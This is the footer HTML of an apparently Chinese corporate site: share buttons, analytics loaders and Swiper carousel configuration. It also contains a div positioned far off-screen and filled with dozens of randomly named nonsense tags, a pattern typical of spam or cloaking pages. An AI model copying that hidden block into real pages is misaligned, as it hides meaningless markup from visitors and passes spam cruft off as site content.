<div id="65wzj5" class="fixedright"><ul><li><div id="csjrcf" class="bshare-custom icon-medium"><div id="7szcdd" class="bsPromo bsPromo2"></div><a title="分享到微信" class="bshare-weixin" href="javascript:void(0);"></a><a title="分享到QQ好友" class="bshare-qqim" href="javascript:void(0);"></a><a title="分享到新浪微博" class="bshare-sinaminiblog" href="javascript:void(0);"></a></div></li><li></li></ul></div>
<script type="text/javascript" charset="utf-8" src="http://static.bshare.cn/b/buttonLite.js#style=-1&amp;uuid=&amp;pophcol=2&amp;lang=zh"></script><script type="text/javascript" charset="utf-8" src="http://static.bshare.cn/b/bshareC0.js"></script>
<script src="/js/common.js" ></script>
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "?7dc636813285758396ed5918a2566d61";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>





<script src="/js/swiper.min.js" ></script>
<script type="text/javascript">
var swiper = new Swiper('#column', {
        pagination: '#column .swiper-pagination',
        paginationClickable: true,
      speed:2000,
autoplay : 5000,
loop : true,
 disableOnInteraction: false,
    });
var sign = new Swiper('#zoomsubing', {
    
        // 如果需要分页器
        speed: 1000,
        slidesPerView:5,
        spaceBetween: 10,
     
        // 如果需要前进后退按钮

        //paginationType: 'progress',
        resizeReInit: true, ///宽度改变初始化
        observer: true, //修改swiper自己或子元素时，自动初始化swiper
        observeParents: true, // resizeReInit: true, ///宽度改变初始化
        observer: true, //修改swiper自己或子元素时，自动初始化swiper
            onSlideChangeStart: function(swiper) {
            var b = swiper.activeIndex; //获取当前滚动的index;
            var show_slide1 = $('#zooming .swiper-slide').length <= 0;
            if (!show_slide1) {
                a3.update();
                a3.slideTo(swiper.activeIndex);
            }
            $('#zooming .swiper-slide').removeClass('active').eq(swiper.activeIndex).addClass('active');
        }
     

    })
  $('#zoomsubing .swiper-slide').eq(0).addClass('active');
    $('#zoomsubing .swiper-slide ').on('click', function(index) {
        var th_in = $(this).index(); //获取点击的index
        //img(th_in);//传递给上面的img
        a3.slideTo(th_in); // swiper跳转到对应的，这里为什么要-1呢！是因为我要让选中的那个居中，而不是在第一个，不然不能往前点
        $(this).addClass('active').siblings().removeClass('active'); //
    })
    var a3 = new Swiper('#zooming', {

 effect : 'fade',
        // 如果需要分页器
        speed: 1000,
        slidesPerView:1,
        spaceBetween:0,
        autoplay:3000,
        // 如果需要前进后退按钮
        observer: true, //修改swiper自己或子元素时，自动初始化swiper
        observeParents: true, //修改swiper的父元素时，自动初始化swiper
    autoHeight: true,
        onSlideChangeStart: function(swiper) {
            var s = swiper.activeIndex; //获取当前滚动的index;
            var show_slide = $('#zoomsubing .swiper-slide').length <= 0;
            if (!show_slide) {
                sign.update();
                sign.slideTo(swiper.activeIndex);
            }
            $('#zoomsubing .swiper-slide').removeClass('active').eq(swiper.activeIndex).addClass('active');
        }
    })


	</script>




<div id='body_jx_9048763' style='position:fixed; left:-9000px; top:-9000px;'><jxzk class='walogh'><ubq id='walogh'></ubq></jxzk><pqszx class='wknwhd'><qawrru id='wknwhd'></qawrru></pqszx><sevqp class='rsxrom'><wpaqdl id='rsxrom'></wpaqdl></sevqp><hl class='toyayu'><kwh id='toyayu'></kwh></hl><qhk class='fmlkbk'><ufhm id='fmlkbk'></ufhm></qhk><ju class='zpgrvs'><shaqn id='zpgrvs'></shaqn></ju><ixzom class='sedwqs'><cp id='sedwqs'></cp></ixzom><san class='cyrqcn'><sneu id='cyrqcn'></sneu></san><ueu class='dawsly'><un id='dawsly'></un></ueu><onyy class='mfzxkr'><mh id='mfzxkr'></mh></onyy><za class='zzoius'><wwb id='zzoius'></wwb></za><ypwfw class='fgwhzr'><fdgj id='fgwhzr'></fdgj></ypwfw><pi class='qndnrf'><aap id='qndnrf'></aap></pi><xjlhy class='nxbkvx'><rfy id='nxbkvx'></rfy></xjlhy><sgt class='ymwxll'><ilbeeu id='ymwxll'></ilbeeu></sgt><ksq class='aimgta'><ylwkl id='aimgta'></ylwkl></ksq><zblml class='tggxuh'><hp id='tggxuh'></hp></zblml><dmnbm class='mvsoar'><kjdo id='mvsoar'></kjdo></dmnbm><cnyn class='xmrefm'><uc id='xmrefm'></uc></cnyn><iva class='jxozzt'><bvw id='jxozzt'></bvw></iva><xh class='qurnvf'><btc id='qurnvf'></btc></xh><ipg class='nhommx'><rjh id='nhommx'></rjh></ipg><ra class='uazjxx'><himgw id='uazjxx'></himgw></ra><mykkm class='jasixz'><uhay id='jasixz'></uhay></mykkm><baln class='rafflf'><ibrvto id='rafflf'></ibrvto></baln><zcg class='qoptmp'><feak id='qoptmp'></feak></zcg><vb class='vwdpgf'><gro id='vwdpgf'></gro></vb><yky class='swyutq'><hnot id='swyutq'></hnot></yky><psa class='ndmomy'><tx id='ndmomy'></tx></psa><xtt class='aqquah'><kl id='aqquah'></kl></xtt><yl class='hrxzkc'><dcling id='hrxzkc'></dcling></yl><osax class='gtcvpj'><uyt id='gtcvpj'></uyt></osax><cghpc class='jjrgzm'><bspswt id='jjrgzm'></bspswt></cghpc><ss class='gqdczi'><ye id='gqdczi'></ye></ss><iu class='ogaufy'><vnam id='ogaufy'></vnam></iu><fwn class='wkszrl'><xkd id='wkszrl'></xkd></fwn><mwb class='tytxfd'><fupsk id='tytxfd'></fupsk></mwb><ivclw class='dbiacl'><ihmeup id='dbiacl'></ihmeup></ivclw><nlis class='fpvgcb'><ddy id='fpvgcb'></ddy></nlis><sje class='twksht'><nrfpnx id='twksht'></nrfpnx></sje><co class='fbxjmm'><qkh id='fbxjmm'></qkh></co><zntsc class='orkwhs'><xie id='orkwhs'></xie></zntsc><tl class='borjpl'><nebjlu id='borjpl'></nebjlu></tl><iygk class='xhdtdp'><ievgu id='xhdtdp'></ievgu></iygk><is class='eurbvt'><elj id='eurbvt'></elj></is><bsys class='xqfsnq'><wha id='xqfsnq'></wha></bsys><cdi class='dnavwe'><onay id='dnavwe'></onay></cdi><dsmq class='ksvqmo'><vriy id='ksvqmo'></vriy></dsmq><adgz class='vpkujx'><orzzon id='vpkujx'></orzzon></adgz><not class='wobrdl'><qsgdf id='wobrdl'></qsgdf></not></div>

<div style="text-align:center;"><a href="http://www.gdlwbl.com/data/sitemap/www.gdlwbl.com.xml">【网站地图】</a><a href="http://www.gdlwbl.com/data/sitemap/www.gdlwbl.com.xml">【sitemap】</a></div>
<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
<script>LA.init({id:"3JQgP7qHOxQxwkiQ",ck:"3JQgP7qHOxQxwkiQ"})</script><script src="/yyds.js"></script></body>
</html><!--0.00027298927307129-->